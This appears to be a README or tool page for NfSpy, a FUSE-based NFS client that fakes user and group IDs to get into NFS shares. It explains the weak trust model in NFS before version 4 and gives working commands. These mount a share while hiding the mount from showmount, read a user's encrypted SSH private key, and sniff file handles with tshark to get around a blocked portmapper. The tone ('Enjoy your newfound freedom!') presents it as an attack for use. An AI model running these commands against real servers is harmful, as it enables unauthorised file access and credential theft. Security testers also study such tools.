NfSpy – ID-spoofing NFS Client

NfSpy is a library/program that uses the Filesystem in Userspace (FUSE) library to automate the falsification of NFS credentials when mounting an NFS share.

Vulnerability exploited
NFS before version 4 is reliant upon host trust relationships for authentication. The NFS server trusts any client machines to authenticate users and assign the same user IDs (UIDS) that the shared filesystem uses. This works in NIS, NIS+, and LDAP domains, for instance, but only if you know the client machine is not compromised, or faking its identity. This is because the only authentication in the NFS protocol is the passing of the UID and GID (group ID). There are a few things that can be done to enhance the security of NFS, but many of them are incomplete solutions, and even with all three listed here, it could still be possible to circumvent the security measures.

Using NfSpy

A list of options can be seen by running
nfspy --help


There is an NFS server on

$ showmount -e
Export list for
/home (everyone)

Mount up the share. Using sudo lets you bind to a privileged port, and the allow_other option lets any user use the filesystem. The other new option here is "hide", which immediately "unmounts" the share on the server, but keeps the filehandle it got. This hides your presence from anyone using showmount -a

$ sudo nfspy -o server=,hide,allow_other,ro,intr /mnt

Enjoy your newfound freedom!

$ cd /mnt
/mnt$ ls -l
drwx------ 74 8888 200 4096 2011-03-03 09:55 smithj
/mnt$ cd smithj
/mnt/smithj$ cat .ssh/id.rsa
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,30AEB543E512CA19

To unmount, use fusermount:
$ sudo fusermount -u /mnt
Advanced example
There is an NFS server on Portmap is blocked, so you can't get a list of shares, but you can sniff the network traffic.
$ sudo tshark -n -i eth0 -T fields -e nfs.fhandle
Running as user "root" and group "root". This could be dangerous.
Capturing on eth0

^C3 packets captured

Now use the dirhandle and getroot mount options to avoid using the mount daemon, and use the nfsport option to avoid using the portmapper, traversing up the directory tree to the root of the export.

$ sudo nfspy -o rw,server=,nfsport=2049/udp,dirhandle=01:00:04:01:01:00:22:00:e5:03:d8:9d:07:00:22:00:15:83:74:d5:

